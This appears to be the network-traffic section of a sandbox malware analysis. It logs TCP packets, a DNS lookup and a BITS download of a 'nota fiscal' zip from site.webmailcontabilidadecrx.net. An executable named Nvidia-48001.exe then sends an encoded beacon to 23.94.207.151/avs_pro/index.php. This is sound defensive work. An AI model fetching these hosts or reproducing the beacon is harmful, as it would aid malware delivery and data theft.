                                                          Dec 20, 2024 15:28:40.069917917 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:40.072016001 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:40.072115898 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:40.076000929 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:40.076147079 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:40.079240084 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:40.079430103 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:40.082700968 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:40.082817078 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:40.085537910 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:40.085647106 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:40.090424061 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:40.090522051 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:40.092845917 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:40.092946053 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:40.096704006 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:40.096808910 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:40.101449013 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:40.101612091 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:40.105398893 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:40.105479956 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:40.108747005 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:40.108849049 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:40.111937046 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:40.112090111 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:40.218493938 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:40.218767881 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:40.221195936 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:40.221293926 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:40.223586082 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:40.223664045 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:40.261162996 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:40.261271000 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:40.263283968 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:40.263358116 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:40.267304897 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:40.267385960 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:40.270215034 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:40.270288944 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:40.273150921 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:40.273235083 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:40.276695967 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:40.276787043 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:40.280421972 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:40.280512094 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:40.283060074 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:40.283189058 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:40.286807060 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:40.286917925 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:40.290761948 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:40.290877104 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:40.293359995 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:40.293474913 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:40.296818972 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:40.296924114 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:40.299586058 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:40.299676895 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:40.303323984 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:40.303421021 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:40.414715052 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:40.414805889 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:40.417673111 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:40.417737007 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:40.420340061 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:40.420403004 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:40.455037117 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:40.455111980 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:40.458041906 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:40.458122015 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:40.461066008 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:40.461137056 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:40.464317083 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:40.464452028 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:40.467914104 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:40.467995882 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:40.471785069 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:40.471851110 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:40.474318027 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:40.474420071 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:40.478157997 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:40.478266001 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:40.482593060 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:40.482685089 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:40.485241890 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:40.485306025 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:40.487255096 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:40.487337112 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:40.491677999 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:40.491739035 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:40.494383097 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:40.494466066 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:40.609210968 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:40.609297991 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:40.612234116 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:40.612286091 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:40.614897966 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:40.614984035 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:40.646126986 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:40.646197081 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:40.649516106 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:40.649642944 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:40.652947903 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:40.653032064 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:40.655956030 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:40.656028986 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:40.659533024 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:40.659595013 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:40.663486004 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:40.663558960 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:40.666851997 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:40.666932106 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:40.670414925 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:40.670545101 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:40.674143076 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:40.674245119 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:40.677826881 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:40.677891016 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:40.681408882 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:40.681467056 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:40.684293032 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:40.684377909 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:40.687848091 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:40.687942982 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:40.800961018 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:40.801136017 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:40.803395987 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:40.803575993 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:40.805825949 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:40.805941105 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:40.837630033 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:40.837752104 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:40.840140104 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:40.840209961 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:40.843539000 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:40.843729973 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:40.846714973 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:40.846774101 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:40.849911928 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:40.850023031 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:40.853490114 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:40.853565931 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:40.857032061 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:40.857105017 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:40.859961033 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:40.860029936 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:40.863413095 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:40.863528967 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:40.867077112 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:40.867165089 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:40.869925976 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:40.870012999 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:40.873910904 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:40.874047995 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:40.876429081 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:40.876501083 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:40.880073071 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:40.880152941 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:40.994227886 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:40.994388103 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:40.997302055 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:40.997380018 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:40.999769926 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:40.999831915 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:41.031450987 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:41.031590939 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:41.033720970 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:41.033809900 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:41.037966967 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:41.038062096 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:41.041007042 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:41.041105032 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:41.044351101 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:41.044430971 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:41.048079967 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:41.048197031 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:41.050889015 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:41.051048994 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:41.054394007 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:41.054497004 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:41.057168007 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:41.057252884 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:41.060923100 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:41.061008930 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:41.064537048 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:41.064660072 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:41.067348003 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:41.067449093 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:41.070869923 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:41.070943117 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:41.188314915 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:41.188453913 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:41.191374063 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:41.191447020 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:41.193855047 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:41.193937063 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:41.223321915 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:41.223408937 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:41.225931883 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:41.226011038 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:41.229744911 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:41.229810953 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:41.233378887 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:41.233448029 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:41.236165047 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:41.236224890 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:41.239753962 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:41.239876032 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:41.242628098 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:41.242693901 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:41.246196985 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:41.246260881 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:41.249830008 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:41.249886990 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:41.249946117 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:41.253388882 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:41.253473043 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:41.256274939 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:41.256337881 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:41.259960890 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:41.260042906 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:41.262780905 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:41.262846947 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:41.380436897 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:41.380572081 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:41.382167101 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:41.382247925 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:41.385258913 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:41.385328054 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:41.416579962 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:41.416677952 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:41.419138908 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:41.419234037 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:41.422745943 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:41.422826052 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:41.425857067 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:41.425936937 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:41.429394007 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:41.429482937 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:41.432243109 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:41.432307959 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:41.435906887 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:41.435992002 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:41.438777924 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:41.438844919 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:41.442260981 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:41.442409039 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:41.445039034 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:41.445126057 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:41.448705912 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:41.448801041 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:41.452423096 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:41.452524900 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:41.456007957 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:41.456084967 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:41.458770990 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:41.458837986 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:41.573875904 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:41.574070930 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:41.576355934 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:41.576478004 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:41.578946114 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:41.579030037 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:41.611160040 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:41.611481905 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:41.614408016 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:41.614675045 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:41.618531942 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:41.618604898 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:41.621898890 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:41.621969938 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:41.626585007 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:41.626673937 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:41.630183935 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:41.630270004 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:41.632603884 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:41.632724047 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:41.634735107 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:41.634835005 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:41.637536049 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:41.637609005 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:41.641820908 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:41.641899109 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:41.642719984 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:41.642781019 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:41.642784119 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:41.642832041 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:41.643074036 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:41.643074036 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:41.643089056 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:41.643096924 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:47.761415005 CET4979980192.168.2.623.94.207.151
                                                          Dec 20, 2024 15:28:47.881118059 CET804979923.94.207.151192.168.2.6
                                                          Dec 20, 2024 15:28:47.881273031 CET4979980192.168.2.623.94.207.151
                                                          Dec 20, 2024 15:28:47.881584883 CET4979980192.168.2.623.94.207.151
                                                          Dec 20, 2024 15:28:47.881584883 CET4979980192.168.2.623.94.207.151
                                                          Dec 20, 2024 15:28:48.001229048 CET804979923.94.207.151192.168.2.6
                                                          Dec 20, 2024 15:28:48.001610994 CET804979923.94.207.151192.168.2.6
                                                          Dec 20, 2024 15:28:49.218918085 CET804979923.94.207.151192.168.2.6
                                                          Dec 20, 2024 15:28:49.269263029 CET4979980192.168.2.623.94.207.151
                                                          Dec 20, 2024 15:28:54.220936060 CET804979923.94.207.151192.168.2.6
                                                          Dec 20, 2024 15:28:54.221008062 CET4979980192.168.2.623.94.207.151
                                                          Dec 20, 2024 15:28:54.522397995 CET4979980192.168.2.623.94.207.151
                                                          Dec 20, 2024 15:28:54.641856909 CET804979923.94.207.151192.168.2.6
                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Dec 20, 2024 15:28:24.130407095 CET6511953192.168.2.61.1.1.1
                                                          Dec 20, 2024 15:28:24.268512964 CET53651191.1.1.1192.168.2.6
                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                          Dec 20, 2024 15:28:24.130407095 CET192.168.2.61.1.1.10x3f46Standard query (0)site.webmailcontabilidadecrx.netA (IP address)IN (0x0001)false
                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                          Dec 20, 2024 15:28:24.268512964 CET1.1.1.1192.168.2.60x3f46No error (0)site.webmailcontabilidadecrx.net34.95.215.169A (IP address)IN (0x0001)false
                                                          • site.webmailcontabilidadecrx.net
                                                          • 23.94.207.151
                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          0192.168.2.64979923.94.207.151804256C:\Nvidia-48001\Nvidia-48001.exe
                                                          TimestampBytes transferredDirectionData
                                                          Dec 20, 2024 15:28:47.881584883 CET250OUTPOST /avs_pro/index.php HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded; Charset=UTF-8
                                                          Accept: */*
                                                          User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                          Content-Length: 135
                                                          Host: 23.94.207.151
                                                          Dec 20, 2024 15:28:47.881584883 CET135OUTData Raw: 6f 70 3d 43 32 4d 69 32 4b 65 79 4d 56 35 43 53 69 56 79 61 32 77 52 61 41 42 78 64 48 4d 49 43 46 78 54 4d 56 6b 6a 42 6c 6c 66 56 6c 78 44 52 68 59 47 43 42 6c 62 57 30 4a 4b 57 42 68 65 52 56 64 66 46 41 4d 43 64 56 46 4e 47 54 5a 50 49 53 38
                                                          Data Ascii: op=C2Mi2KeyMV5CSiVya2wRaABxdHMICFxTMVkjBllfVlxDRhYGCBlbW0JKWBheRVdfFAMCdVFNGTZPIS8YfnV9ZGcVcnJ+fCQvKSglcmsDAhwFBxkFCAteS1xDQmMICwYEaRY=
                                                          Dec 20, 2024 15:28:49.218918085 CET203INHTTP/1.1 200 OK
                                                          Date: Fri, 20 Dec 2024 14:28:48 GMT
                                                          Server: Apache/2.4.41 (Ubuntu)
                                                          Content-Length: 0
                                                          Keep-Alive: timeout=5, max=100
                                                          Connection: Keep-Alive
                                                          Content-Type: text/html; charset=UTF-8


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          0192.168.2.64973734.95.215.1694431364C:\Windows\System32\svchost.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-20 14:28:25 UTC182OUTHEAD /notafiscal/download/cat.zip HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept: */*
                                                          Accept-Encoding: identity
                                                          User-Agent: Microsoft BITS/7.8
                                                          Host: site.webmailcontabilidadecrx.net
                                                          2024-12-20 14:28:26 UTC267INHTTP/1.1 200 OK
                                                          Date: Fri, 20 Dec 2024 14:28:26 GMT
                                                          Server: Apache
                                                          Upgrade: h2
                                                          Connection: Upgrade, close
                                                          Last-Modified: Wed, 18 Dec 2024 07:18:28 GMT
                                                          ETag: "83c3db-6298638673d7e"
                                                          Accept-Ranges: bytes
                                                          Content-Length: 8635355
                                                          Content-Type: application/zip


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          1192.168.2.64974334.95.215.1694431364C:\Windows\System32\svchost.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-20 14:28:27 UTC233OUTGET /notafiscal/download/cat.zip HTTP/1.1
